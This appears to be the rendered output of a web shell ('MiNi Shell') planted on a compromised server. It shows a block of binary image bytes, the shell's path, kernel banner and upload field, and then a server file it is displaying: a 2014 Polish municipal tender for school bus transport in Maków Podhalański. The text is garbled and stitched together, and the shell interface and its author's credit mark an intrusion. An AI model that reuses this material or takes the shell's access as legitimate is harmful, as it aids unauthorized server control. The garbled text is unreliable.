JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140617/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140617/205208-N-2014.html

<p class="kh_header"><b>Maków Podhalański: Dowóz uczniów do szkół podstawowych i gimnazjalnych Gminy Maków Podhalański oraz na basen w Suchej Beskidzkiej, w ramach zajęć wychowania fizycznego, w roku szkolnym 2014/2015.</b><br>
<b>Numer ogłoszenia: 205208 - 2014; data zamieszczenia: 17.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Zarząd Placówek Oświatowych , ul. Szpitalna 3, 34-220 Maków Podhalański, woj. małopolskie, tel. 33 8749755, faks 33 8749753.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.makow-podhalanski.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nd</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów do szkół podstawowych i gimnazjalnych Gminy Maków Podhalański oraz na basen w Suchej Beskidzkiej, w ramach zajęć wychowania fizycznego, w roku szkolnym 2014/2015..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dowóz uczniów do szkół podstawowych i gimnazjalnych Gminy Maków Podhalański oraz na basen w Suchej Beskidzkiej, w ramach zajęć wychowania fizycznego, w roku szkolnym 2014/2015
Zadanie I: Dowóz uczniów do szkół podstawowych i gimnazjalnych Gminy Maków Podhalański w roku szkolnym 2014/2015 poprzez zakup biletów miesięcznych w transporcie regularnym.
Zadanie II: Dowóz uczniów na basen w Suchej Beskidzkiej w ramach zajęć lekcji wychowania fizycznego.
       AD. Zadania I okres świadczenia usług: od dnia 01.09.2014 do dnia 26.06.2015 r. dowóz odbywać będzie się codziennie od poniedziałku do piątku za wyjątkiem dni wolnych od nauki.
 
Dowóz obejmuje trasy:
    Do Zespołu Szkół w Makowie Podhalańskim: 
    przywóz uczniów do szkoły na godz. 740 - rozpoczęcie lekcji 800
    Trasa I: Maków Dolny - Maków Szkoła
             3 km x 2 = 6 km - 16 uczniów 
    Godzina odjazdu po zakończonych zajęciach: od poniedziałku do piątku 1430
Trasa II: Osiedle Jurki przez Makowską Górę - Maków  Szkoła 
               5 km x 2 =10 km - 22 uczniów + opiekun (opiekuna zapewnia Zamawiający)  
Os. Jurki - 1  uczeń
Os. Bryndze - 10 uczniów 
Os. Koziany -  1 uczeń 
Os. Makowska Góra - 7 uczniów 
    Godzina odjazdu po zakończonych zajęciach: od poniedziałku do piątku 1430
w okresie zimowym tj. od 02.11.2014 r. do 31.03.2015 r. 
dowóz od Makowska Góra - Maków Szkoła = 3 km x 2 = 6 km
Trasa III: Białka Skrzyżowanie - Maków Szkoła 
               4 km x 2 = 8 km - 7 uczniów + 1 opiekun (opiekuna zapewnia Zamawiający)
Białka Skrzyżowanie - 1 uczeń                 
Białka Most - 1 uczeń
Żarnówka Sobaniaki - 5 uczniów 
         Godzina odjazdu po zakończonych zajęciach: od poniedziałku do piątku 1430
    
     Do Zespołu Szkół w Białce: 
     przywóz uczniów do szkoły na godz. 730  - rozpoczęcie lekcji 735 
Trasa IV: Żarnówka  Dolna (Sklep u Lasy)- Szkoła Białka
                    9 km x 2 = 18 km - 19 uczniów w tym: 
Żarnówka Dolna (Sklep u Lasy) - 10 uczniów
Żarnówka Kościół - 7 uczniów
Żarnówka Remiza - 2 uczniów
         Godzina odjazdu po zakończonych zajęciach: od poniedziałku do piątku 1405
Trasa V: Wieprzec (Pętla) - Szkoła Białka 
                   13 km x 2 = 26 km - 42 uczniów w tym:
Żarnówka Szkoła Przysłop - 16 uczniów	
Żarnówka Potoki - 6 uczniów
Wieprzec Główny - 16 uczniów
Wieprzec Brzanki - 2 uczniów
Wieprzec Most - 1 uczeń          	
Kojszówka Pustki - 1 uczeń
         Godzina odjazdu po zakończonych zajęciach: od poniedziałku do piątku 1405

     Do Zespołu Szkół w Grzechyni: 
     przywóz uczniów do szkoły godz. 820  - rozpoczęcie lekcji 830
Trasa VI: Grzechynia Carchle - Grzechynia Polana - Grzechynia Szkoła
                   4,2 km - 9 uczniów + opiekun (opiekuna zapewnia Zamawiający)  
Grzechynia Carchle - 2 uczniów
Grzechynia Polana - 7 uczniów
         Godzina odjazdu po zakończonych zajęciach:
         1305  Grzechynia Szkoła - Grzechynia Carchle - 2 uczniów = 3,1 km
         1500  Grzechynia Szkoła - Grzechynia Polana - 7 uczniów = 3 km 
			
    Do Zespołu Szkół w Juszczynie:
    przywóz uczniów do szkoły na godz. 745 - rozpoczęcie lekcji godz. 800
   Trasa VII: Kojszówka Remiza - Juszczyn Szkoła
              4,2 km x 2 = 8,4 km - 8 uczniów w tym:
Kojszówka Pętla - 2 uczniów
Kojszówka Remiza - 4 uczniów               
Kojszówka Dolne Zagrody - 2 uczniów
         Godzina odjazdu po zakończonych zajęciach: 1315, 1500 
   Trasa VIII: Juszczyn Przysłop - Juszczyn Szkoła 
                    7,1 km x 2 = 14,2 km - 39 uczniów + 1 opiekun (opiekuna zapewnia Zamawiający) 
Semestr  I  tj. od 01.09.2014r. do 13.02.2015r. - I zmiana odjazd z przystanku godz. 720
Juszczyn Przysłop - 13 uczniów 
Juszczyn Snozy - 6 uczniów 
Juszczyn Szkoła - 6 uczniów 
Juszczyn Huta - 8 uczniów  
Juszczyn Cadyń Górny - 6 uczniów 
         Godzina odjazdu po zakończonych zajęciach: 1315, 1500
Semestr  I   tj. od 01.09.2014r. do 13.02.2015r. - II zmiana odjazd z przystanku godz. 1010
               6 uczniów + opiekun (opiekuna zapewnia Zamawiający)
Juszczyn Szkoła - 2 uczniów
Juszczyn Cadyń Górny - 4 uczniów 
         Godzina odjazdu po zakończonych zajęciach: 1500
Semestr  II  tj. od 02.03.2015r. do 26.06.2015r. - I zmiana odjazd z przystanku godz. 720
               38 uczniów + opiekun (opiekuna zapewnia Zamawiający)
Juszczyn Przysłop - 10 uczniów                 
Juszczyn Snozy - 6 uczniów 
Juszczyn Szkoła - 7 uczniów 
Juszczyn Huta - 8 uczniów  
Juszczyn  Cadyń Górny - 7 uczniów 
          Godzina odjazdu po zakończonych zajęciach: 1315, 1500
     Semestr II  tj. od 02.03.2015r. do 26.06.2015r. - II zmiana odjazd z przystanku godz. 1010  
                    7 uczniów + opiekun (opiekuna zapewnia Zamawiający)    
Juszczyn Przysłop - 2 uczniów              
Juszczyn Szkoła - 1 uczeń 
Juszczyn Huta - 1 uczeń 
Juszczyn  Cadyń Górna - 3 uczniów 
         Godzina odjazdu po zakończonych zajęciach: 1500
   Trasa IX: Juszczyn Zgudowa - Juszczyn Szkoła 
                  3 km  x 2 = 6 km   
     Semestr  I  tj. od 01.09.2014r. do 13.02.2015r. - I zmiana odjazd z przystanku godz. 730
              23 uczniów + opiekun (opiekuna zapewnia Zamawiający)
         Godzina odjazdu po zakończonych zajęciach: 1315, 1500 
    Semestr  I  tj. od 01.09.2014r. do 13.02.2015r. - II zmiana odjazd z przystanku godz. 1020
             2 uczniów + opiekun (opiekuna zapewnia zamawiający) 
         Godzina odjazdu po zakończonych zajęciach: 1500

    Semestr  II  tj. od 02.03.2015r. do 27.06.2015r. - I zmiana odjazd z przystanku godz. 730
              15 uczniów + opiekun (opiekuna zapewnia Zamawiający)
         Godzina odjazdu po zakończonych zajęciach: 1315, 1500 
   Semestr  II  tj. od 02.03.2015r. do 27.06.2015r. - II zmiana odjazd z przystanku godz. 1020
             10 uczniów + opiekun (opiekuna zapewnia Zamawiający) 
         Godzina odjazdu po zakończonych zajęciach: 1500 

     Do Szkoły Podstawowej w Żarnówce: 
     przywóz uczniów do szkoły na godz. 820 - rozpoczęcie lekcji godz. 830
   Trasa X:  Żarnówka u Sobaniaka - Żarnówka Szkoła Przysłop
                4,3 km x 2 = 8,6 km   odjazd z przystanku godz.810 (autobus nr 1)
           23 uczniów (klasa IV- VI) + opiekun (opiekuna zapewnia Zamawiający) 
Żarnówka u Sobaniaka - 1 uczeń
Żarnówka Remiza - 7 uczniów
Żarnówka Bory (kościół) - 7 uczniów
Żarnówka u Lasy - 8 uczniów
         Godzina odjazdu po zakończonych zajęciach: 1505  3x w tygodniu  
                                                                                   1420  2x w tygodniu
   Trasa XI: Żarnówka Remiza - Żarnówka Szkoła Przysłop 
                3,5 km x 2 = 7 km    odjazd z przystanku godz.810 (autobus nr 2) 
           39 uczniów (klasa 0 - III ) + opiekun (opiekuna zapewnia Zamawiający)
Żarnówka Remiza - 11 uczniów
Żarnówka Bory (kościół) - 11 uczniów
Żarnówka u Lasy - 17 uczniów
         Godzina odjazdu po zakończonych zajęciach: 1400  

Ad. Zadania II:
Dowóz obejmuje trasy:
Trasa I: Zespół Szkół Grzechynia - Zespół Szkół Maków Podhalański - basen Sucha Beskidzka
            10,4 km x 2 = 20,8 km
Poniedziałek: wyjazd z Zespołu Szkół Grzechynia godz. 925      -  10 uczniów + 1 opiekun
                   przez Zespół Szkół Maków Podhalański godz. 940  -  20 uczniów + 1 opiekun
Wyjazd z basenu w Suchej Beskidzkiej godz. 1130
Trasa II: Zespół Szkół Białka - Zespół Szkół Juszczyn - Basen Sucha Beskidzka
            15 km x 2 = 30 km
Wtorek: wyjazd z Zespołu Szkół Białka godz. 735    - 15 uczniów + 1 opiekun
            przez Zespół Szkół Juszczyn godz. 745             - 15 uczniów + 1 opiekun
Wyjazd z basenu w Suchej Beskidzkiej godz. 940
Dzienna ilość kilometrów dowozu uczniów na basen w Suchej Beskidzkiej: 
Poniedziałek = 20,8 km
Wtorek = 30 km
Miesięczna ilość kilometrów dowozu uczniów na basen w Suchej Beskidzkiej:
Wrzesień 2014 (4 pn, 5 wt) = 233,2 km
Październik 2014 (4 pn, 4 wt) = 203,2 km
Listopad 2014 (4 pn, 3 wt) = 173,2 km
Grudzień 2014 (3 pn, 3 wt) = 152,4 km
Styczeń 2015 (4 pn, 3 wt) = 173,2 km
Luty 2015 (2 pn, 2 wt) = 101,6 km
Marzec 2015 (5 pn, 5wt) = 254 km
Kwiecień 2015 (3 pn, 3 wt) = 152,4 km
Maj 2015 (4 pn, 4 wt) = 203,2 km
Czerwiec 2015 (4 pn, 4 wt) = 203,2 km
Razem km = 1849,6 km ~1850 km
Zmiany wynikające z organizacji roku szkolnego będą wprowadzane aneksem do umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.00.00.00-8, 60.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda od Wykonawców:aktualnego dokumentu potwierdzającego że, Wykonawca prowadzi działalność w zakresie wykonywania usług objętych zamówieniem i posiada uprawnienia do ich wykonywania. Wykonawca wykaże, że posiada licencję na wykonywanie krajowego transportu drogowego lub zezwolenie na wykonywanie przewozów regularnych, wynikających z ustawy z dnia 6 września 2001 r., o transporcie drogowym (Dz. U. z 2013 r. poz. 1414), oraz oświadczenia o spełnianiu warunków udziału w postępowaniu określone w art. 22 ust. 1 PZP (wg. zał. nr 3)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda od Wykonawców ubiegających się o zamówienie:wykaz zrealizowanych i wykonanych usług z należytą starannością. Wykonawca winien wykazać, że w ciągu ostatnich trzech lat przed dniem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, daty oraz miejsca wykonania, z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane z należytą starannością: wymagana ilość - jedna usługa polegającą na przewozie osób przez okres, co najmniej 10 miesięcy o wartości - nie mniejszej niż 250 000 złotych brutto (wg zał. nr 5 do SIWZ), jak również oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust.1 i ust. 2 pkt 1 ustawy Prawo zamówień publicznych (wg. zał. nr 4)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga od Wykonawców ubiegających się o udzielenie zamówienia:wykaz niezbędnego potencjału technicznego - warunkiem udziału w przetargu jest posiadanie (własności lub użyczenia na podstawie umowy cywilnoprawnej), co najmniej 3 autobusów o liczbie miejsc 50, wszystkie muszą być w dobrym stanie technicznym, potwierdzonym stosownymi przeglądami technicznymi</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>osoby zdolne do wykonania zamówienia - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający odstępuje od sposobu dokonania oceny spełnienia warunku, dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu (wg zał. nr 3).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia tego warunku Zamawiający wymaga od Wykonawców:opłaconej polisy w zakresie niezbędnym do wykazania, że Wykonawca znajduje się w dobrej sytuacji ekonomicznej i finansowej a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy jest możliwa jedynie w szczególnie uzasadnionych okolicznościach i na warunkach określonych w SIWZ zgodnie z art. 144 ust. 1 Ustawy Pzp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.makow-podhalanski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Zarząd Placówek Oświatowych w Makowie Podhalańskim ul. Szpitalna 3, 34-220 Maków Podhalański, pokój nr 25 piętro II.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2014 godzina 09:00, miejsce: Gminny Zarząd Placówek Oświatowych w Makowie Podhalańskim ul. Szpitalna 3, 34-220 Maków Podhalański, pokój nr 25 piętro II.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com